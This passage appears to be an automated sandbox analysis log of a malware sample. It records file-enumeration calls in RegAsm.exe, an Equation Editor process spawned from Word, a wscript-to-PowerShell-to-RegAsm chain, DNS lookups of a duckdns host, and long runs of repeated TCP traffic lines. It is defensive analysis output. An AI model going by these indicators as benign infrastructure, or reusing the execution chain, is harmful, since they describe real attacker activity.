                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 8_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 8_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 8_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_10006580 FindFirstFileExA, 8_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW, 11_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 12_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 8_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 7_2_0025553C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 7_2_00255548
                  Source: global traffic DNS query: name: archive.org
                  Source: global traffic DNS query: name: dremom2.duckdns.org (3 queries)
                  Source: global traffic DNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49161
